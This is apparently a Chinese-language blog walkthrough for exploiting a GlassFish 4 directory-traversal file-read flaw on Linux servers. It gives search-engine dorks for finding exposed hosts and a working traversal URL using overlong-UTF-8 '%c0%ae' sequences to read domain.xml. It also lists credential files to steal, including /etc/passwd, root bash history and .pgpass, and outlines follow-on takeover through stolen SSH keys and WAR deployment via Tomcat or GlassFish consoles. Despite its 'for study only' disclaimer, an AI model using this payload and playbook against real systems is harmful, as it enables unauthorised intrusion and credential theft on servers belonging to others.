只要討論的是linux環境
測試發現只針對GlassFish4，且基本上是已root執行的
http://www.wooyun.org/bugs/wooyun-2010-0144595

zoomeye dork
GlassFish Server Open Source Edition 4.1 
放張圖

nosec的dork 
body="Copyright © 2005, 2013, Oracle and/or its affiliates. All rights reserved. Oracle and Java are registered trademarks of Oracle and/or its affiliates. Other names may be trademarks of their respective owners."

放張圖

竟然是讀檔案，先來看看linux下比較敏感的檔案
/etc/issue 版本資訊
/var/spool/cron/crontabs/root　定時任務
/etc/passwd 
/root/.bash_history　bash環境下的命令執行歷史記錄
/root/.pgpass　記錄連線postgressql伺服器的密碼
/root/.psql_history　potgressql客戶端的執行的sql語句歷史記錄

重點關注/etc/passwd檔案，後面帶有的:/bin/bash　這個檔案告訴我們有那些使用者，會分別對應/home/下的資料夾(預設情況下) 
還有/root/.bash_history,這裡面敏感資訊比較多。

各種資料庫密碼：

url:http://xxxxx:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/domain.xml

我遇到的情況

利用ssh的祕鑰認證

ssh-keygen -t rsa　預設會在~/.ssh／目錄下生成兩個檔案id_rsa(私鑰) 和id_ras.pub(公鑰) 
mv id_rsa.pub authorized_keys
authorized_keys這個檔案和ssh公鑰認證有關，在用ssh登陸的時候，有私鑰就可以免密碼登陸。

把id_rsa複製到本機的 ~/.ssh/目錄記得要把許可權改成600哦

然後就可以登陸了

一句話總結就是，服務端的authorized_keys內的公鑰對應的私鑰被你知道了
把私鑰放到你本機的~/.ssh/id_rsa，就可以使用ssh登陸　　

利用tomcat部署war包

運氣好的話讀取下tomcat目錄下的
/conf/tomcat-users.xml，也許沒有註釋掉，再部署war包

利用GlassFish部署war包

密碼檔案在GlassFish安裝目錄下
/glassfish/domains/domain1/config/admin-keyfile
可惜不是明文

另外:在zoomeye搜GlassFish還有部分機子是沒有密碼就可以登陸哦！

利用PostgreSQL

注: 
本文僅供學習交流，請勿用於非法用途。